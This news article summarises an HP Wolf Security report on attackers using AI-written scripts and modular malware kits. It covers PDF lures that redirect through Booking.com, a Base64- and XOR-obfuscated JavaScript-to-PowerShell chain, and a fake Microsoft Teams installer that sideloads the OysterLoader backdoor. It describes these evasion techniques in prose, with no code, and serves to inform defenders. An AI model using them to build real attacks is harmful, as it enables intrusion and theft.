AI is helping cybercriminals to rapidly assemble malware with flat-pack efficiency. It’s almost like buying a sofa from Ikea, and perhaps even easier to put together.
A new Threat Insight Report from HP Wolf Security finds that attackers are prioritizing speed, cost, and efficiency over quality or sophistication – using AI-generated “vibe hacking” scripts and modular “flat pack” malware kits to scale operations.
While technically simple, the campaigns are proving effective at slipping past enterprise defenses by blending in with familiar websites, apps, and software.
Based on data from millions of endpoints running HP Wolf Security, HP threat researchers identified multiple real-world campaigns abusing well-known brands to build user trust and evade detection.
Vibe hacking scripts hidden behind Booking.com
HP researchers said many PDF-based threats blocked in Q4 led to credential and credit card phishing pages. However, PDFs also continue to function as a reliable malware delivery vehicle.
In most cases, the malware is not embedded directly inside the PDF but the document acts as a lure. Attackers use blurred document previews or fake error messages, promoting users to “click to view.”
When clicked, the embedded hyperlink triggers a download from a compromised website.
In one campaign, the victim was redirected to Booking.com – a tactic that increases trust and reduces suspicion.
“This sequence makes it appear that the legitimate site initiated the download and increases the user’s trust in the file,” the report noted.
Has your password leaked?
The downloaded file often masquerades as a harmless document by manipulation of file names, using double file extensions and space padding, for instance, to disguise its true format.
In this case, the first stage was a JavaScript file that downloaded and executed a PowerShell payload.
The script contained a long ‘Base64’ encoded string – an encoding method that converts binary data into text made up of letters and numbers to hide malicious code inside what appears to be harmless text.
Once decoded, the script applied a scrambling technique (an XOR operation) to decrypt the data and reveal the actual malicious instructions.
Notably, while the JavaScript was obfuscated, the PowerShell stage isn’t – which is a growing trend, HP researchers say, that they’re seeing in the wild.
Fake Microsoft Teams site delivers backdoor
Another campaign leveraged search engine optimization (SEO) poisoning and malvertising to direct victims to a fake Microsoft Teams website.
The malicious site closely resembled Microsoft’s legitimate video comms platform, only with the URL revealing its true nature.
When users click “Download Microsoft Teams for Windows,” the site generates a background link after verifying that its payload domain was active. The infrastructure was designed to allow attackers to rotate domains if one went offline.
The installer bundled the legitimate Microsoft Teams setup files alongside additional executables. HP said that this ensured the expected software was installed normally, reducing suspicion.
Among the added components was a signed executable associated with the CapCut video editing application, and a malicious DLL file containing the malware.
Have thoughts about this topic? Others do, too. Join them in the discussion.
Using a technique known as “DLL sideloading,” the signed executable loaded the malicious DLL, triggering its execution while bypassing some Windows security checks.
The final payload was OysterLoader, a backdoor frequently noted prior to ransomware deployment. Once installed, it gives attackers persistent control of the compromised device and the ability to deploy further malware.
“Speed and cost over quality”
Alex Holland, Principal Threat Research at HP Security Lab, noted that attackers are deliberately trading sophistication for efficiency.
“It’s the classic project management triangle – speed, quality, and cost. You often sacrifice one of them. What we’re seeing is that many attackers are optimizing for speed and cost, not quality.
"They are not using AI to raise the bar; they’re using it to move faster and reduce effort. The campaigns themselves are basic, but the uncomfortable reality is they still work.”
Alex Holland, Principal Threat Research at HP Security Lab
HP Wolf suggest organizations prepare for a growing wave of AI-assisted hacking that relies less on technical brilliance and more on automation, trusted brand impersonation, and modular, reusable components.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked